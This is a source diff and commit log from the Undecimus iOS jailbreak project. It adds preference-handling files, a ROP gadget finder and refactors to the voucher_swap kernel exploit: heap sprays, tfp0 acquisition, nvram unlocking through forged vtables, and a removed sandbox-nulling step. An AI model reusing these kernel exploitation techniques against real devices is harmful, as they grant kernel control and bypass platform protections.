        !MACH_PORT_VALID(hsp4))
@@ -1032,7 +1005,6 @@ value = value | ((uint64_t)read64_tmp << 32)
    if (MACH_PORT_VALID(host)) {
        mach_port_deallocate(mach_task_self(), host);
        host = MACH_PORT_NULL;
-        original_host = HOST_NULL;
    }
    
    if (MACH_PORT_VALID(thread)) {
@@ -14,7 +14,7 @@
 #include <pthread.h>

 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include <common.h>

@@ -503,7 +503,7 @@ static uint32_t early_rk32(uint64_t kaddr)
        LOG("pid_for_task returned %x", err);
    }
    LOG("read val via pid_for_task: %08x", val);
-    free(pipe_contents);
+    SafeFreeNULL(pipe_contents);
    return val;
 }

@@ -533,7 +533,7 @@ static mach_port_t prepare_tfp0(uint64_t vm_map, uint64_t receiver)
    // replace the ipc_kmsg:
    write(early_read_pipe_write_end, pipe_contents, PIPE_SIZE);

-    free(pipe_contents);
+    SafeFreeNULL(pipe_contents);

    // early_read_port is no longer only capable of reads!
    return early_read_port;
@@ -0,0 +1,76 @@
+//
+//  prefs.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef prefs_h
+#define prefs_h
+
+#include <stdio.h>
+#include <stdbool.h>
+
+#define K_TWEAK_INJECTION          "TweakInjection"
+#define K_LOAD_DAEMONS             "LoadDaemons"
+#define K_DUMP_APTICKET            "DumpAPTicket"
+#define K_REFRESH_ICON_CACHE       "RefreshIconCache"
+#define K_BOOT_NONCE               "BootNonce"
+#define K_EXPLOIT                  "Exploit"
+#define K_DISABLE_AUTO_UPDATES     "DisableAutoUpdates"
+#define K_DISABLE_APP_REVOKES      "DisableAppRevokes"
+#define K_OVERWRITE_BOOT_NONCE     "OverwriteBootNonce"
+#define K_EXPORT_KERNEL_TASK_PORT  "ExportKernelTaskPort"
+#define K_RESTORE_ROOTFS           "RestoreRootFS"
+#define K_INCREASE_MEMORY_LIMIT    "IncreaseMemoryLimit"
+#define K_ECID                     "Ecid"
+#define K_INSTALL_OPENSSH          "InstallOpenSSH"
+#define K_INSTALL_CYDIA            "InstallCydia"
+#define K_RELOAD_SYSTEM_DAEMONS    "DoReloadSystemDaemons"
+#define K_HIDE_LOG_WINDOW          "HideLogWindow"
+#define K_RESET_CYDIA_CACHE        "ResetCydiaCache"
+#define K_SSH_ONLY                 "SSHOnly"
+#define K_DARK_MODE                "DarkMode"
+#define K_ENABLE_GET_TASK_ALLOW    "DoEnableGetTaskAllow"
+#define K_SET_CS_DEBUGGED          "SetCSDebugged"
+#define K_AUTO_RESPRING            "AutoRespring"
+#define K_CODE_SUBSTITUTOR         "CodeSubstitutor"
+
+typedef struct {
+    bool load_tweaks;
+    bool load_daemons;
+    bool dump_apticket;
+    bool run_uicache;
+    const char *boot_nonce;
+    bool disable_auto_updates;
+    bool disable_app_revokes;
+    bool overwrite_boot_nonce;
+    bool export_kernel_task_port;
+    bool restore_rootfs;
+    bool increase_memory_limit;
+    const char *ecid;
+    bool install_cydia;
+    bool install_openssh;
+    bool reload_system_daemons;
+    bool reset_cydia_cache;
+    bool ssh_only;
+    bool enable_get_task_allow;
+    bool set_cs_debugged;
+    bool hide_log_window;
+    bool auto_respring;
+    bool dark_mode;
+    int exploit;
+    int code_substitutor;
+} prefs_t;
+
+prefs_t *new_prefs(void);
+prefs_t *copy_prefs(void);
+void release_prefs(prefs_t **prefs);
+bool load_prefs(prefs_t *prefs);
+bool set_prefs(prefs_t *prefs);
+void register_default_prefs(void);
+void repair_prefs(void);
+void reset_prefs(void);
+
+#endif /* prefs_h */
@@ -0,0 +1,161 @@
+//
+//  prefs.c
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#include "prefs.h"
+#include <Foundation/Foundation.h>
+#include <common.h>
+#include "utils.h"
+
+@interface NSUserDefaults ()
+- (id)objectForKey:(id)arg1 inDomain:(id)arg2;
+- (void)setObject:(id)arg1 forKey:(id)arg2 inDomain:(id)arg3;
+@end
+
+static NSUserDefaults *userDefaults = nil;
+static NSString *prefsFile = nil;
+
+prefs_t *new_prefs() {
+    prefs_t *prefs = (prefs_t *)malloc(sizeof(prefs_t));
+    assert(prefs != NULL);
+    bzero(prefs, sizeof(prefs_t));
+    return prefs;
+}
+
+prefs_t *copy_prefs() {
+    prefs_t *prefs = new_prefs();
+    load_prefs(prefs);
+    return prefs;
+}
+
+void release_prefs(prefs_t **prefs) {
+    SafeFreeNULL(*prefs);
+}
+
+bool load_prefs(prefs_t *prefs) {
+    if (prefs == NULL) {
+        return false;
+    }
+    prefs->load_tweaks = (bool)[[userDefaults objectForKey:@K_TWEAK_INJECTION inDomain:prefsFile] boolValue];
+    prefs->load_daemons = (bool)[[userDefaults objectForKey:@K_LOAD_DAEMONS inDomain:prefsFile] boolValue];
+    prefs->dump_apticket = (bool)[[userDefaults objectForKey:@K_DUMP_APTICKET inDomain:prefsFile] boolValue];
+    prefs->run_uicache = (bool)[[userDefaults objectForKey:@K_REFRESH_ICON_CACHE inDomain:prefsFile] boolValue];
+    prefs->boot_nonce = (const char *)[[userDefaults objectForKey:@K_BOOT_NONCE inDomain:prefsFile] UTF8String];
+    prefs->disable_auto_updates = (bool)[[userDefaults objectForKey:@K_DISABLE_AUTO_UPDATES inDomain:prefsFile] boolValue];
+    prefs->disable_app_revokes = (bool)[[userDefaults objectForKey:@K_DISABLE_APP_REVOKES inDomain:prefsFile] boolValue];
+    prefs->overwrite_boot_nonce = (bool)[[userDefaults objectForKey:@K_OVERWRITE_BOOT_NONCE inDomain:prefsFile] boolValue];
+    prefs->export_kernel_task_port = (bool)[[userDefaults objectForKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile] boolValue];
+    prefs->restore_rootfs = (bool)[[userDefaults objectForKey:@K_RESTORE_ROOTFS inDomain:prefsFile] boolValue];
+    prefs->increase_memory_limit = (bool)[[userDefaults objectForKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile] boolValue];
+    if ([[userDefaults objectForKey:@K_ECID inDomain:prefsFile] isKindOfClass:NSString.class]) {
+        prefs->ecid = (const char *)[[userDefaults objectForKey:@K_ECID inDomain:prefsFile] UTF8String];
+    }
+    prefs->install_cydia = (bool)[[userDefaults objectForKey:@K_INSTALL_CYDIA inDomain:prefsFile] boolValue];
+    prefs->install_openssh = (bool)[[userDefaults objectForKey:@K_INSTALL_OPENSSH inDomain:prefsFile] boolValue];
+    prefs->reload_system_daemons = (bool)[[userDefaults objectForKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile] boolValue];
+    prefs->reset_cydia_cache = (bool)[[userDefaults objectForKey:@K_RESET_CYDIA_CACHE inDomain:prefsFile] boolValue];
+    prefs->ssh_only = (bool)[[userDefaults objectForKey:@K_SSH_ONLY inDomain:prefsFile] boolValue];
+    prefs->enable_get_task_allow = (bool)[[userDefaults objectForKey:@K_ENABLE_GET_TASK_ALLOW inDomain:prefsFile]boolValue];
+    prefs->set_cs_debugged = (bool)[[userDefaults objectForKey:@K_SET_CS_DEBUGGED inDomain:prefsFile] boolValue];
+    prefs->exploit = (int)[[userDefaults objectForKey:@K_EXPLOIT inDomain:prefsFile] intValue];
+    prefs->hide_log_window = (bool)[[userDefaults objectForKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile] boolValue];
+    prefs->auto_respring = (bool)[[userDefaults objectForKey:@K_AUTO_RESPRING inDomain:prefsFile] boolValue];
+    prefs->dark_mode = (bool)[[userDefaults objectForKey:@K_DARK_MODE inDomain:prefsFile] boolValue];
+    prefs->code_substitutor = (int)[[userDefaults objectForKey:@K_CODE_SUBSTITUTOR inDomain:prefsFile] intValue];
+    return true;
+}
+
+bool set_prefs(prefs_t *prefs) {
+    if (prefs == NULL) {
+        return false;
+    }
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->load_tweaks] forKey:@K_TWEAK_INJECTION inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->load_daemons] forKey:@K_LOAD_DAEMONS inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->dump_apticket] forKey:@K_DUMP_APTICKET inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->run_uicache] forKey:@K_REFRESH_ICON_CACHE inDomain:prefsFile];
+    if (prefs->boot_nonce) [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->boot_nonce] forKey:@K_BOOT_NONCE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_auto_updates] forKey:@K_DISABLE_AUTO_UPDATES inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_app_revokes] forKey:@K_DISABLE_APP_REVOKES inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->overwrite_boot_nonce] forKey:@K_OVERWRITE_BOOT_NONCE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->export_kernel_task_port] forKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->restore_rootfs] forKey:@K_RESTORE_ROOTFS inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->increase_memory_limit] forKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile];
+    if (prefs->ecid) [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->ecid] forKey:@K_ECID inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_cydia] forKey:@K_INSTALL_CYDIA inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_openssh] forKey:@K_INSTALL_OPENSSH inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->reload_system_daemons] forKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->reset_cydia_cache] forKey:@K_RESET_CYDIA_CACHE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->ssh_only] forKey:@K_SSH_ONLY inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->enable_get_task_allow] forKey:@K_ENABLE_GET_TASK_ALLOW inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged] forKey:@K_SET_CS_DEBUGGED inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithInt:(int)prefs->exploit] forKey:@K_EXPLOIT inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->hide_log_window] forKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->auto_respring] forKey:@K_AUTO_RESPRING inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->dark_mode] forKey:@K_DARK_MODE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithInt:(int)prefs->code_substitutor] forKey:@K_CODE_SUBSTITUTOR inDomain:prefsFile];
+    [userDefaults synchronize];
+    return true;
+}
+
+void register_default_prefs() {
+    NSMutableDictionary *defaults = [NSMutableDictionary new];
+    defaults[@K_TWEAK_INJECTION] = @YES;
+    defaults[@K_LOAD_DAEMONS] = @YES;
+    defaults[@K_DUMP_APTICKET] = @YES;
+    defaults[@K_REFRESH_ICON_CACHE] = @NO;
+    defaults[@K_BOOT_NONCE] = @"0x1111111111111111";
+    defaults[@K_DISABLE_AUTO_UPDATES] = @YES;
+    defaults[@K_DISABLE_APP_REVOKES] = @YES;
+    defaults[@K_OVERWRITE_BOOT_NONCE] = @YES;
+    defaults[@K_EXPORT_KERNEL_TASK_PORT] = @NO;
+    defaults[@K_RESTORE_ROOTFS] = @NO;
+    defaults[@K_INCREASE_MEMORY_LIMIT] = @NO;
+    defaults[@K_ECID] = @"0x0";
+    defaults[@K_INSTALL_CYDIA] = @NO;
+    defaults[@K_INSTALL_OPENSSH] = @NO;
+    defaults[@K_RELOAD_SYSTEM_DAEMONS] = @YES;
+    defaults[@K_SSH_ONLY] = @NO;
+    defaults[@K_ENABLE_GET_TASK_ALLOW] = @YES;
+    defaults[@K_SET_CS_DEBUGGED] = @NO;
+    defaults[@K_HIDE_LOG_WINDOW] = @NO;
+    defaults[@K_AUTO_RESPRING] = @NO;
+    defaults[@K_DARK_MODE] = @YES;
+    defaults[@K_EXPLOIT] = [NSNumber numberWithInteger:recommendedJailbreakSupport()];
+    defaults[@K_CODE_SUBSTITUTOR] = [NSNumber numberWithInteger:recommendedSubstitutorSupport()];
+    [userDefaults registerDefaults:defaults];
+}
+
+void repair_prefs() {
+    prefs_t *prefs = copy_prefs();
+    if (prefs->exploit != -1) {
+        exploit_info_t *exploit_info = get_exploit_info(prefs->exploit);
+        if (exploit_info != NULL) {
+            if (!checkDeviceSupport(exploit_info->device_support_info)) {
+                prefs->exploit = (int)recommendedJailbreakSupport();
+            }
+        }
+    }
+    if (prefs->code_substitutor != -1) {
+        substitutor_info_t *substitutor_info = get_substitutor_info(prefs->code_substitutor);
+        if (substitutor_info != NULL) {
+            if (!checkDeviceSupport(substitutor_info->device_support_info)) {
+                prefs->code_substitutor = (int)recommendedSubstitutorSupport();
+            }
+        }
+    }
+    set_prefs(prefs);
+    release_prefs(&prefs);
+}
+
+void reset_prefs() {
+    [userDefaults removePersistentDomainForName:[[NSBundle mainBundle] bundleIdentifier]];
+}
+__attribute__((constructor))
+static void ctor() {
+    userDefaults = [NSUserDefaults standardUserDefaults];
+    prefsFile = [NSString stringWithFormat:@"%@/Library/Preferences/%@.plist", NSHomeDirectory(), [[NSBundle mainBundle] bundleIdentifier]];
+}
@@ -10,14 +10,40 @@
 #include <mach/mach_traps.h>
 #include <mach/task.h>

-extern uint64_t
-find_blr_x19_gadget(void);
-
 #include "remote_call.h"
 #include "remote_memory.h"

 #include <common.h>

+#if !__arm64e__
+static uint64_t find_gadget_candidate(char **alternatives, size_t gadget_length) {
+    void *const haystack_start = (void *)atoi; // will do...
+    size_t haystack_size = 100*1024*1024; // likewise...
+    
+    for (char *candidate = *alternatives; candidate != NULL; alternatives++) {
+        void *found_at = memmem(haystack_start, haystack_size, candidate, gadget_length);
+        if (found_at != NULL){
+            LOG("found at: %llx", (uint64_t)found_at);
+            return (uint64_t)found_at;
+        }
+    }
+    return 0;
+}
+
+static uint64_t blr_x19_addr = 0;
+static uint64_t find_blr_x19_gadget()
+{
+    if (blr_x19_addr != 0){
+        return blr_x19_addr;
+    }
+    char *const blr_x19 = "\x60\x02\x3f\xd6";
+    char* candidates[] = {blr_x19, NULL};
+    blr_x19_addr = find_gadget_candidate(candidates, 4);
+    return blr_x19_addr;
+}
+
+#endif
+
 // no support for non-register args
 #define MAX_REMOTE_ARGS 8

@@ -11,7 +11,7 @@
 #include <iokit.h>
 #include <common.h>
 #include "KernelUtilities.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelMemory.h"
 #include "find_port.h"
 #include "pac.h"
@@ -41,7 +41,7 @@ uint64_t get_iodtnvram_obj(void) {
            LOG("Failed to get IODTNVRAM service");
            return 0;
        }
-        uint64_t nvram_up = get_address_of_port(getpid(), IODTNVRAMSrv);
+        uint64_t nvram_up = get_address_of_port(proc_struct_addr(), IODTNVRAMSrv);
        IODTNVRAMObj = ReadKernel64(nvram_up + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

        LOG("IODTNVRAM obj at 0x%llx", IODTNVRAMObj);
@@ -72,7 +72,7 @@ int unlocknvram(void) {
        kernel_xpaci(buf[searchNVRAMProperty / sizeof(uint64_t)]);

    // allocate buffer in kernel
-    fake_vtable_xpac = kmem_alloc_wired(kernel_buffer_size);
+    fake_vtable_xpac = IOMalloc(kernel_buffer_size);
    
    // Forge the pacia pointers to the virtual methods.
    size_t count = 0;
@@ -101,7 +101,7 @@ int unlocknvram(void) {
    // replace vtable on IODTNVRAM object
    WriteKernel64(obj, fake_vtable);

-    free(buf);
+    SafeFreeNULL(buf);
    LOG("Unlocked nvram");
    return 0;
 }
@@ -119,7 +119,7 @@ int locknvram(void) {
    }
    
    WriteKernel64(obj, orig_vtable);
-    kmem_free(fake_vtable_xpac, kernel_buffer_size);
+    SafeIOFreeNULL(fake_vtable_xpac, kernel_buffer_size);

    LOG("Locked nvram");
    return 0;
@@ -15,6 +15,7 @@
 #include "log.h"
 #include "mach_vm.h"
 #include "parameters.h"
+#include "common.h"

 // ---- Global variables --------------------------------------------------------------------------

@@ -321,7 +322,7 @@ stage3_kernel_call_init() {
 	uint64_t *vtable = stage2_copyout_user_client_vtable();
 	size_t count = stage2_patch_user_client_vtable(vtable);
 	stage2_patch_user_client(vtable, count);
-	free(vtable);
+	SafeFreeNULL(vtable);
 	return true;
 }

@@ -10,6 +10,7 @@
 #define _UTILS_H
 #import <sys/types.h>
 #import <sys/stat.h>
+#include <mach/machine.h>
 #import "ArchiveFile.h"

 #define system(x) _system(x)
@@ -28,9 +29,67 @@ typedef enum {
    mach_swap_exploit,
    mach_swap_2_exploit,
    deja_xnu_exploit,
-    necp_exploit
+    necp_exploit,
+    kalloc_crash
 } exploit_t;

+typedef enum {
+    substrate_substitutor = 0,
+} substitutor_t;
+
+typedef enum {
+    jailbreak_capability = 0,
+    respring_capability,
+    reboot_capability
+} exploit_capability_t;
+
+typedef enum {
+    lowest_exploit_reliability = 0,
+    low_exploit_reliability,
+    middle_exploit_reliability,
+    high_exploit_reliability,
+    highest_exploit_reliability
+} exploit_reliability;
+
+typedef struct {
+    const char *min_kernel_version;
+    const char *max_kernel_version;
+    bool (^handler)(void);
+} device_support_info_t;
+
+typedef struct {
+    exploit_t exploit;
+    const char *name;
+    exploit_capability_t exploit_capability;
+    exploit_reliability exploit_reliability;
+    device_support_info_t device_support_info;
+} exploit_info_t;
+
+typedef enum {
+    lowest_substitutor_stability = 0,
+    low_substitutor_stability,
+    middle_substitutor_stability,
+    high_substitutor_stability,
+    highest_substitutor_stability
+} substitutor_stability;
+
+typedef struct {
+    substitutor_t substitutor;
+    const char *name;
+    const char *package_id;
+    const char *startup_executable;
+    const char *server_executable;
+    const char *run_command;
+    const char *loader_killswitch;
+    const char *bootstrap_tools;
+    substitutor_stability substitutor_stability;
+    device_support_info_t device_support_info;
+    char **resources;
+} substitutor_info_t;
+
+extern exploit_info_t *exploit_infos[];
+extern substitutor_info_t *substitutor_infos[];
+
 enum hashtype {
    HASHTYPE_MD5 = 0,
    HASHTYPE_SHA1
@@ -45,6 +104,7 @@ int proc_pidpath(pid_t pid, void *buffer, uint32_t buffersize);
 - (BOOL) registerApplicationDictionary:(id)application;
 - (BOOL) installApplication:(id)application withOptions:(id)options;
 - (BOOL) _LSPrivateRebuildApplicationDatabasesForSystemApps:(BOOL)system internal:(BOOL)internal user:(BOOL)user;
+- (BOOL) applicationIsInstalled:(id)arg1;
@end

 static inline bool create_file_data(const char *file, int owner, mode_t mode, NSData *data) {
@@ -88,10 +148,10 @@ bool pkgIsInstalled(char *packageID);
 bool pkgIsConfigured(char *packageID);
 bool pkgIsBy(const char *maintainer, const char *packageID);
 bool compareInstalledVersion(const char *packageID, const char *op, const char *version);
-bool extractDeb(NSString *debPath);
-bool extractDebs(NSArray <NSString *> *debPaths);
+bool extractDeb(NSString *debPath, bool doInject);
+bool extractDebs(NSArray <NSString *> *debPaths, bool doInject);
 bool installDeb(const char *debName, bool forceDeps);
-bool installDebs(NSArray <NSString*> *debs, bool forceDeps);
+bool installDebs(NSArray <NSString*> *debs, bool forceDeps, bool forceAll);
 bool removePkg(char *packageID, bool forceDeps);
 bool removePkgs(NSArray <NSString*> *packageIDs, bool forceDeps);
 BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
@@ -99,9 +159,12 @@ NSString *debForPkg(NSString *pkg);
 bool aptUpdate(void);
 bool aptInstall(NSArray <NSString*> *pkgs);
 bool aptUpgrade(void);
+bool aptRepair(void);
 bool runApt(NSArray <NSString*> *args);
 bool extractAptPkgList(NSString *path, ArchiveFile* listcache, id_t owner);
 bool ensureAptPkgLists(void);
+bool removeURLFromSources(NSMutableString *sources, NSString *url);
+void deduplicateSillySources(void);
 bool is_symlink(const char *filename);
 bool is_directory(const char *filename);
 bool is_mountpoint(const char *filename);
@@ -113,15 +176,23 @@ int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unre
 int runCommand(const char *cmd, ...);
 NSString *pathForResource(NSString *resource);
 pid_t pidOfProcess(const char *name);
+char *getKernelVersion(void);
+char *getMachineName(void);
+char *getModelName(void);
 bool kernelVersionContains(const char *string);
 bool machineNameContains(const char *string);
 bool multi_path_tcp_enabled(void);
 bool jailbreakEnabled(void);
-bool supportsExploit(exploit_t exploit);
+NSString *getKernelBuildVersion(void);
+exploit_info_t *get_exploit_info(exploit_t exploit);
+substitutor_info_t *get_substitutor_info(substitutor_t substitutor);
+bool checkDeviceSupport(device_support_info_t device_support);
 bool jailbreakSupported(void);
+bool substitutorSupported(void);
 bool respringSupported(void);
 bool restartSupported(void);
 NSInteger recommendedJailbreakSupport(void);
+NSInteger recommendedSubstitutorSupport(void);
 NSInteger recommendedRestartSupport(void);
 NSInteger recommendedRespringSupport(void);
 bool daemonIsLoaded(char *daemonID);
@@ -142,6 +213,23 @@ bool canOpen(const char *URL);
 bool airplaneModeEnabled(void);
 bool installApp(const char *bundle);
 bool rebuildApplicationDatabases(void);
+char *get_path_for_pid(pid_t pid);
+NSString *getECID(void);
+NSString *getUDID(void);
+char *sysctlWithName(const char *name);
+char *getOSVersion(void);
+char *getOSProductVersion(void);
+void printOSDetails(void);
+bool isBetaFirmware(void);
+double getUptime(void);
+vm_size_t get_kernel_page_size(void);
+int waitForFile(const char *filename);
+NSString *hexFromInt(NSInteger val);
+void waitFor(int seconds);
+bool blockDomainWithName(const char *name);
+bool unblockDomainWithName(const char *name);
+bool cydiaIsInstalled(void);
+NSString *localize(NSString *str, ...);

 extern NSData *lastSystemOutput;

@@ -18,6 +18,7 @@
 #include "mach_vm.h"
 #include "parameters.h"
 #include "platform.h"
+#include "common.h"


 // ---- Global parameters -------------------------------------------------------------------------
@@ -194,7 +195,7 @@ voucher_spray_free(mach_port_t *voucher_ports, size_t count) {
 			mach_port_deallocate(mach_task_self(), voucher_ports[i]);
 		}
 	}
-	free(voucher_ports);
+	SafeFreeNULL(voucher_ports);
 }

 // ---- Helpers -----------------------------------------------------------------------------------
@@ -665,7 +666,7 @@ stage3_init(uint64_t ipc_space_kernel, uint64_t kernel_map) {
 	fake_port = MACH_PORT_NULL;
 	success = true;
 fail_1:
-	free(data);
+	SafeFreeNULL(data);
 fail_0:
 	return success;
 }
@@ -824,11 +825,11 @@ voucher_swap() {

 	// 6. Spray 15% of memory in kalloc.1024 that we can free later to
 	// prompt gc. We'll reuse some of the early ports from the port spray above for this.
-    const size_t gc_spray_size = (kCFCoreFoundationVersionNumber >= 1535.12 ? 0.15 : 0.10) * platform.memory_size;
+    const size_t gc_spray_size = (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 0.15 : 0.10) * platform.memory_size;
 	printf("Spray size: %ld\n", gc_spray_size);
 	mach_port_t *gc_ports = filler_ports;
 	size_t gc_port_count = 500;        // Use at most 500 ports for the spray.
-    sprayed_size = kalloc_spray_size(gc_ports, &gc_port_count, (kCFCoreFoundationVersionNumber >= 1535.12 ? 768 : 300) + 1, 1024, gc_spray_size);
+    sprayed_size = kalloc_spray_size(gc_ports, &gc_port_count, (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 768 : 300) + 1, 1024, gc_spray_size);
 	INFO("sprayed %zu bytes to %zu ports in kalloc.%u", sprayed_size, gc_port_count, 1024);
    
 	// 7. Stash a pointer to an ipc_voucher in the thread's ith_voucher field and then remove
@@ -881,7 +882,7 @@ voucher_swap() {
 	// kalloc.32768 zone. We need to do this slowly in order to force a zone garbage
 	// collection. Spraying 17% of memory (450 MB on the iPhone XR) with OOL ports should be
 	// plenty.
-    const size_t ool_ports_spray_size = (kCFCoreFoundationVersionNumber >= 1535.12 ? 0.25 : 0.085) * platform.memory_size;
+    const size_t ool_ports_spray_size = (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 0.25 : 0.085) * platform.memory_size;
 	mach_port_t *ool_holding_ports = gc_ports + gc_port_count;
 	size_t ool_holding_port_count = 500;    // Use at most 500 ports for the spray.
 	sprayed_size = ool_ports_spray_size_with_gc(ool_holding_ports, &ool_holding_port_count,
@@ -890,7 +891,7 @@ voucher_swap() {
 			ool_ports_spray_size);
 	INFO("sprayed %zu bytes of OOL ports to %zu ports in kalloc.%zu",
 			sprayed_size, ool_holding_port_count, ool_port_spray_kalloc_zone);
-	free(ool_ports);
+	SafeFreeNULL(ool_ports);

 	// 12. Once we've reallocated the voucher with an OOL ports allocation, the iv_refs field
 	// will overlap with the lower 32 bits of the pointer to base_port. If base_port's address
@@ -1000,9 +1001,9 @@ voucher_swap() {
 	// ports, and close the sprayed pipes.
 	thread_terminate(thread);
 	destroy_ports(filler_ports, filler_port_count);
-	free(filler_ports);
+	SafeFreeNULL(filler_ports);
 	close_pipes(pipefds_array, pipe_count);
-	free(pipefds_array);
+	SafeFreeNULL(pipefds_array);

 	// 17. Use mach_port_request_notification() to put a pointer to an array containing
 	// base_port in our port's ip_requests field.
@@ -1138,14 +1139,12 @@ voucher_swap() {

 	// 29. And finally, deallocate the remaining unneeded (but non-corrupted) resources.
 	pipe_close(pipefds);
-	free(pipe_buffer);
+	SafeFreeNULL(pipe_buffer);
 	mach_port_destroy(mach_task_self(), base_port);
    
-    // 30. Unsandbox
-    uint64_t selfproc = kernel_read64(current_task + OFFSET(task, bsd_info));
-    uint64_t ucred = kernel_read64(selfproc + OFFSET(proc, p_ucred));
-    uint64_t cr_label = kernel_read64(ucred + 0x78);
-    kernel_write64(cr_label + 0x10, 0);
+    // 30. Cache our proc_t address
+    extern uint64_t cached_proc_struct_addr;
+    cached_proc_struct_addr = kernel_read64(current_task + OFFSET(task, bsd_info));

 	// And that's it! Enjoy kernel read/write via kernel_task_port.
 	INFO("done! port 0x%x is tfp0", kernel_task_port);
@@ -1 +1 @@
-2.1.1
+3.2.0
Author	SHA1	Message	Date
Pwn20wnd	53ba03f796	Update README.md	2019-07-12 22:49:59 +03:00
Pwn20wnd	a5defc1338	Update LICENSE	2019-06-28 23:12:58 +03:00
Pwn20wnd	d17752aa43	Update Injector	2019-06-12 16:29:42 +03:00
Pwn20wnd	53786b10ed	Resolves #1082	2019-06-12 12:07:49 +03:00
Pwn20wnd	36fc75544a	Resolves #1097	2019-06-12 11:50:53 +03:00
Pwn20wnd	9d7a1076a2	Begin work to make arbitrarily adding other code substituters possible	2019-06-10 16:02:46 +03:00
Sam Gardner	2f6e337567	merge exploitpicker into master	2019-06-02 14:00:27 -05:00
Sam Bingner	d0ebb39b12	Update bundled uikittools	2019-06-01 23:12:57 -10:00
Pwn20wnd	6ee22bd105	Ignore uicache failures unless fatal	2019-06-02 11:46:56 +03:00
Pwn20wnd	620e7f97c2	Fix a typo	2019-06-02 11:32:12 +03:00
Pwn20wnd	08d3978c40	Addresses https://twitter.com/mattp_12/status/1134936934101454849	2019-06-02 00:41:56 +03:00
Pwn20wnd	bccd7ab71a	Update Update.txt	2019-06-02 00:36:41 +03:00
Pwn20wnd	c4c58e9b82	Fix RootFS Restore info button	2019-06-01 23:55:45 +03:00
Pwn20wnd	978470c4f0	Fix kernel data abort when nullifying the sandbox and don't do it unless we need to	2019-06-01 23:48:01 +03:00
Pwn20wnd	ba0263e062	Update jailbreak resources	2019-06-01 23:07:09 +03:00
Pwn20wnd	7bcc027eae	Lowercase SoC names	2019-06-01 23:04:53 +03:00
Pwn20wnd	14d9fba9b1	Simplify compatibility info	2019-06-01 23:03:14 +03:00
Pwn20wnd	e8e5cd6d8d	Fix missing new lines	2019-06-01 22:54:13 +03:00
Pwn20wnd	711f22bffc	Update uikittools	2019-06-01 22:28:57 +03:00
Pwn20wnd	c6212216ec	Fix names	2019-06-01 22:25:07 +03:00
Pwn20wnd	0c746107e4	Fix locking settings with status	2019-06-01 21:10:43 +03:00
Pwn20wnd	ca70862da9	Fix dark mode when large titles are disabled with a tweak	2019-06-01 21:00:33 +03:00
Pwn20wnd	f02c526071	Add find_vnode_with_fd and find_vnode_with_path	2019-06-01 16:52:59 +03:00
Pwn20wnd	e07dbe7907	Fix layout and localizations issues	2019-06-01 15:11:34 +03:00
Pwn20wnd	83b91fff7c	Add sandbox header	2019-06-01 01:00:55 +03:00
Pwn20wnd	90f426d34a	Update sandbox exceptions	2019-06-01 00:47:47 +03:00
Pwn20wnd	2f757b33d1	Fix font	2019-06-01 00:33:54 +03:00
Pwn20wnd	fa7d177a14	Add unrestrict_library_with_fd	2019-06-01 00:31:20 +03:00
Pwn20wnd	cda002cc07	Add info buttons for most of the options and fix a few UI bugs	2019-06-01 00:31:15 +03:00
Pwn20wnd	fb130a90ff	Update new UI to work nicely with the smaller devices	2019-05-31 17:10:15 +03:00
Joonwoo Kim	a452e2f809	Fixed some spacing issues and fonts issue	2019-05-31 03:02:55 -04:00
